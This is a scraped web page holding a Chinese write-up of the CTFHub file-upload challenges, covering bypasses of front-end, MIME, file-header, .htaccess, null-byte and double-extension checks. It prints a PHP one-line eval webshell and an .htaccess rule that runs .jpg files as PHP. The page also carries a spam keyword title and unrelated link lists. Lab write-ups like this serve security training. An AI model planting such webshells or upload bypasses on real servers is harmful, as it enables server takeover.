当前位置: 首页 > news >正文

欧 美 做 爱 视频网站抖音seo关键词排名技术

欧 美 做 爱 视频网站,抖音seo关键词排名技术,做公司网站计入什么会计科目,南京市建设工程造价管理处网站CTFHub-Web-文件上传-WP 一、无验证 1.编写一段PHP木马脚本 2.将编写好的木马进行上传 3.显示上传成功了 4.使用文件上传工具进行尝试 5.连接成功进入文件管理 6.上翻目录找到flag文件 7.打开文件查看flag 二、前端验证 1.制作payload进行上传发现不允许这种类型的文件上传 …

CTFHub-Web-文件上传-WP

一、无验证

1.编写一段PHP木马脚本

image-20240416174337085

2.将编写好的木马进行上传

image-20240416174449325

3.显示上传成功了

image-20240416174524311

4.使用文件上传工具进行尝试

image-20240416193600047

5.连接成功进入文件管理

image-20240416193749103

6.上翻目录找到flag文件

image-20240416193834579

7.打开文件查看flag

image-20240416193852034


二、前端验证

1.制作payload进行上传发现不允许这种类型的文件上传

image-20240416195044135

2.改后缀名为jpg尝试进行上传

image-20240416195125890

3.上传成功查看源码发现只运行三种格式的文件进行上传

image-20240416195317212

4.打开Burp抓取上传数据包,将上传的文件后缀名改为1.php,文件类型改为php后进行发送

image-20240416195514017

5.显示上传成功

image-20240416195639313

6.打开蚁剑进行连接

image-20240416195745522

7.上翻目录找到flag文件后打开查看flag

image-20240416195839346

三、.htaccess

1.编写一段话,让服务器识别到jpg文件就转换为php语句进行执行,然后将文件后缀名改为.heaccess

AddType application/x-httpd-php .jpg

image-20240416182358378

2.再创建一个PHP程序,写入一句话木马将文件后缀名改为PHP,POST里面包含的就是密码shell

<?php @eval($_POST['shell']);?>

image-20240416182521415

3.先上传.htaccess文件

image-20240416194039254

4.然后上传PHP木马

image-20240416194150598

5.使用蚁剑进行连接

image-20240416194256026

6.连接成功后进入上级目录寻找flag文件并打开获得flag

image-20240416194417487

四、MIME绕过

1.先上传PHP木马发现不允许该类型的文件进行上传

image-20240416202640994

2.将PHP木马的的文件后缀改成JPG后,打开Burp进行抓包

image-20240416202816320

2.将文件文件限制改为image/php后进行发送

image-20240416203209126

3.显示上传成功

image-20240416203238182

4.打开蚁剑进行连接

image-20240416203347479

5.上翻目录找到flag文件所在位置打开查看flag

image-20240416203417201

五、文件头检查

1.打开环境,上传PHP木马后进行抓包

image-20240416203918260

2.将文件类型改为jpg,文件头信息改为GIF89a,表示这是个GIF文件后进行发送

image-20240416204005127

3.显示上传成功

image-20240416204055808

4.使用蚁剑进行连接

image-20240416204154427

5.连接成功后打开文件管理上翻找到flag文件查看flag

image-20240416204223586

六、00截断

1.查看源码发现只能上传jpg,png,gif类型的文件

image-20240416204627397

2.将payload改为jpg格式进行上传,使用Burp进行抓包后更改数据包头进行00截断

image-20240416205057478

3.显示上传成功后打开蚁剑进行连接

image-20240416205145550

4.需要重定义路径进行连接

image-20240416205630366

5.上翻目录找到flag文件进行打开查看flag

image-20240416205729518

七、双写绕过

1.查看页面源码发现使用了双写验证将后缀替换成空,但是只替换了一次

image-20240416210036252

2.将文件后缀改为pphphp

image-20240416210147499

3.在网页直接进行上传,发现文件后缀已经变成了php

image-20240416210224929

4.依旧使用蚁剑进行连接后打开文件管理上翻找到flag文件打开查看flag

image-20240416210311178


image-20240416210353659


http://www.hrbkazy.com/news/7313.html

相关文章:

  • 政府 网站建设方案快速排名上
  • 企业网站建设相关书籍在线阅读百度收录关键词查询
  • 用什么java软件做网站什么软件可以免费引流
  • 黑帽seo寄生虫seo课程培训
  • 成都网站建设推广在地推扫码平台
  • 大兴 网站建设做网络推广的网站有哪些
  • 西安网站建设盈科产品线上推广渠道
  • 无锡做网站f7wl网站链接查询
  • 兼容模式网站错位怎么做网络营销平台
  • 论坛门户静态网页模板搜索引擎优化面对哪些困境
  • 品古典家具网站模板百度指数在线查询工具
  • 移动医护网站建设利弊百度经验app下载
  • 沈阳网站制作培训什么是seo?
  • 宜春做网站哪里好站长之家最新网站
  • 专业做网站建设公司如何注册一个平台
  • 购物网站排名2017凡科建站教程
  • 网站logo如何修改seo排名影响因素主要有
  • 无锡网站建设咨询百度知道个人中心
  • 别人怎么看见我做的网站湖北百度推广电话
  • 做的丑的网站有哪些知乎西安seo外包优化
  • 把一个网站挂到网上要怎么做免费网站建站
  • 带地板翻转的网站怎么做百度推广教程视频教程
  • 易语言网站开发教程青岛网站seo诊断
  • 用模板做网站的方法郑州搜索引擎优化公司
  • 有限公司网站建设 中企动力佛山百度搜索引擎优化的推广计划
  • 移动端网站提交提交it培训机构哪家好
  • 做政府网站排行榜qianhu微建站
  • 做网站的不给做robots文件广州seo推广运营专员
  • 北京建设工程继续教育网站深圳创新创业大赛
  • 做产地证网站怎么做网络推广赚佣金